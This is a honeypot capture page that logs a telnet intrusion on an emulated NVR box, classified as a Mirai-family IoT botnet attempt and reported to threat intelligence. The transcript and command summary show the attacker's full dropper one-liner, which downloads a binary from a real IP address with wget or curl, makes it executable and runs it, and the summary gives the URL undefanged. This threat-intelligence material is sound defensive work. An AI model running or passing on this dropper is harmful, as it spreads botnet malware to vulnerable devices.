HoneyMire Hub

Attack #291660 telnet

Captured 2026-06-29 18:13:43Z by Ka on honeypot LU1 C3 🟡 C3 SuperMini · firmware 1.1.0.

Session recording

Transcript

Server output and attacker input as captured, line-grain. Malware URLs are obscured until sign-in.

Welcome to HiLinux (NVR Box)

hilinux-nvrbox login: root

Password: 1111

BusyBox v1.20.2 (2015-04-01 10:23:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

hilinux-nvrbox# start
sh: start: not found
hilinux-nvrbox# enable
sh: enable: not found
hilinux-nvrbox# config terminal
sh: config: not found
hilinux-nvrbox# system
sh: system: not found
hilinux-nvrbox# linuxshell
sh: linuxshell: not found
hilinux-nvrbox# su
sh: su: not found
hilinux-nvrbox# shell
sh: shell: not found
hilinux-nvrbox# sh
hilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x4c\x4f\x4e\x4f\x4b\x4e'
sh: can't create /usr/.x: nonexistent directory
LONOKN
hilinux-nvrbox# /bin/busybox wget;/bin/busybox echo -ne '\x4c\x4f\x4e\x4f\x4b\x4e'
BusyBox v1.20.2 (2015-04-01 10:23:44 CST) multi-call binary.

Usage: wget [-cq] [-O FILE] [--header 'HEADER: VALUE'] URL
LONOKNhilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget hxxp://78[.]29[.]39[.]213:37497/i ||curl -O hxxp://78[.]29[.]39[.]213:37497/i ||/bin/busybox wget hxxp://78[.]29[.]39[.]213:37497/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x4f\x57\x46\x42\x47\x4c\x4a\x49'
sh: can't create /usr/.x: nonexistent directory
Connecting to 78.29.39.213:37497 (78.29.39.213:37497)
saving to 'i'
i                   100% |*******************************| 1234k  0:00:01 ETA
'i' saved
sh: ./i: not found
OWFBGLJI
hilinux-nvrbox# 

Credentials

Username: root

Password: 1111

1 login attempt(s) before disconnect.

Geolocation hub-resolved

🇷🇺Russia · Tyumen Oblast · Tyumen

MKS75 Network · AS8359 MTS PJSC · 57.15,65.54

Network: residential · Mobile TeleSystems PJSC · Cable/DSL/ISP · peeringdb · medium confidence

Behavioral classification

🦠 95% confidence

Mirai-family IoT botnet — wget + chmod + exec; tries common router/IP-cam credentials.

Matched signals:

• wget/curl download
• chmod/exec chain
• BusyBox probing

Command summary

start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x4c\x4f\x4e\x4f\x4b\x4e'
/bin/busybox wget;/bin/busybox echo -ne '\x4c\x4f\x4e\x4f\x4b\x4e'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://78.29.39.213:37497/i ||curl -O http://78.29.39.213:37497/i ||/bin/busybox wget http://78.29.39.213:37497/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x4f\x57\x46\x42\x47\x4c\x4a\x49'

Reported to threat intel

AlienVault OTX ✓